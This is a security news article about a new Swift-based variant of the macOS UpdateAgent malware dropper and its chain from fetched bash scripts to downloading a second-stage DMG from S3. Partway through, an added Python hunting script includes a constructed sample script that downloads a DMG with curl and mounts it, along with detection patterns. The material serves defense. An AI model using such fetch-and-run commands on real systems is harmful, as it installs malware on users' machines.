UpdateAgent returns with new macOS malware dropper written in Swift

A new variant of the macOS malware tracked as UpdateAgent was spotted in the wild, indicating continued attempts by its authors to upgrade its functionality.

“Perhaps one of the most identifiable features of the malware is that it relies on AWS infrastructure to host its various payloads and perform its infection status updates on the server,” researchers at Jamf Threat Labs said in a report.

UpdateAgent, first detected in late 2020, has since evolved into a malware dropper, making it easier to distribute second-stage payloads such as adware while bypassing macOS Gatekeeper protections.

The newly discovered Swift-based dropper masquerades as Mach-O binaries named “PDFCreator” and “Active Directory” which, when executed, establish a connection to a remote server and retrieve a bash script to run.


“The main difference [between the two executables] is that it navigates to a different URL from which to load a bash script,” the researchers noted.

These bash scripts, named “activedirect.sh” or “bash_qolveevgclr.sh”, include a URL pointing to an Amazon S3 bucket from which a second-stage disk image (DMG) file is downloaded and run on the compromised endpoint.
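The infection chain described above (a dropper binary spawning a shell on a fetched script, which in turn pulls a DMG from S3 and mounts it) is concrete enough to hunt for. The following Python is an added example, not code from Jamf Threat Labs or from the malware; it runs two checks over constructed input: a scan of a fetched bash script for S3-hosted .dmg downloads that are then mounted or opened, and a walk over EDR-style process events for a PDFCreator/ActiveDirectory parent launching a shell on a script named like the ones in the report. The bucket name, the event format and the generalised `bash_<letters>.sh` pattern are assumptions made for the example.

```python
"""Hunting example for the UpdateAgent chain described in the article.

Added example, not Jamf Threat Labs code. The sample script, the sample
process events, the bucket name and the event schema are all constructed.
"""
import re

# Hostname shapes AWS serves S3 objects from: virtual-hosted (bucket.s3[.region].amazonaws.com)
# and path-style (s3[.region].amazonaws.com/bucket). Legacy "s3-region" is covered by [.-].
S3_HOST = (
    r"(?:[\w.-]+\.s3(?:[.-][\w-]+)?\.amazonaws\.com"
    r"|s3(?:[.-][\w-]+)?\.amazonaws\.com/[\w.-]+)"
)
S3_DMG_URL = re.compile(rf"https?://{S3_HOST}/[^\s'\"]+\.dmg\b", re.IGNORECASE)
# Either way a downloaded DMG gets used: mounted with hdiutil or handed to `open`.
MOUNT_OR_OPEN = re.compile(r"\b(?:hdiutil\s+attach|open\s+)", re.IGNORECASE)

# Names the report gives for the dropper binaries (spaces stripped before comparing).
DROPPER_NAMES = {"PDFCreator", "ActiveDirectory"}
# activedirect.sh is from the report; bash_[a-z]+.sh generalises the one
# observed name "bash_qolveevgclr.sh" and is an assumption of this example.
SCRIPT_NAMES = re.compile(r"(?:^|/)(?:activedirect|bash_[a-z]+)\.sh$")
SHELLS = {"bash", "sh", "zsh"}


def s3_dmg_fetches(script_text):
    """Return S3-hosted .dmg URLs found in a script that also mounts/opens a DMG.

    A download alone is not flagged: the page's behaviour is fetch *and* run,
    so a script that only references a DMG URL returns an empty list.
    """
    urls = S3_DMG_URL.findall(script_text)
    if urls and MOUNT_OR_OPEN.search(script_text):
        return urls
    return []


def dropper_shell_chains(events):
    """Return (parent_name, script_path) for shells spawned by the dropper binaries.

    `events` is a list of dicts with pid, ppid, name and cmdline keys; the
    schema is an assumption standing in for whatever an EDR would emit.
    """
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if e["name"] not in SHELLS:
            continue
        args = e["cmdline"].split()
        script = next((a for a in args[1:] if SCRIPT_NAMES.search(a)), None)
        parent = by_pid.get(e["ppid"])
        if script and parent and parent["name"].replace(" ", "") in DROPPER_NAMES:
            hits.append((parent["name"], script))
    return hits


# Constructed sample in the shape the article describes; the bucket is made up.
SAMPLE_SCRIPT = """#!/bin/bash
curl -s -o /tmp/update.dmg https://example-bucket.s3.amazonaws.com/stage2/update.dmg
hdiutil attach -nobrowse /tmp/update.dmg
"""

# Constructed process events: one malicious chain and one benign admin script.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "name": "launchd", "cmdline": "/sbin/launchd"},
    {"pid": 501, "ppid": 100, "name": "PDFCreator", "cmdline": "/Users/u/Downloads/PDFCreator"},
    {"pid": 502, "ppid": 501, "name": "bash", "cmdline": "/bin/bash /tmp/bash_qolveevgclr.sh"},
    {"pid": 503, "ppid": 502, "name": "curl",
     "cmdline": "curl -s -o /tmp/update.dmg https://example-bucket.s3.amazonaws.com/stage2/update.dmg"},
    {"pid": 600, "ppid": 100, "name": "Terminal", "cmdline": "/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"pid": 601, "ppid": 600, "name": "bash", "cmdline": "/bin/bash /Users/u/bin/deploy.sh"},
]

if __name__ == "__main__":
    print("S3 DMG fetches:", s3_dmg_fetches(SAMPLE_SCRIPT))
    print("dropper -> shell chains:", dropper_shell_chains(SAMPLE_EVENTS))
```

The parent/child check is the more durable of the two signals: script names and bucket URLs change between variants, but a freshly downloaded Mach-O whose first action is to hand a fetched script to bash is unusual on an end-user Mac regardless of what the script is called.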

“The continued development of this malware shows that its authors remain active, trying to reach as many users as possible,” the researchers said.
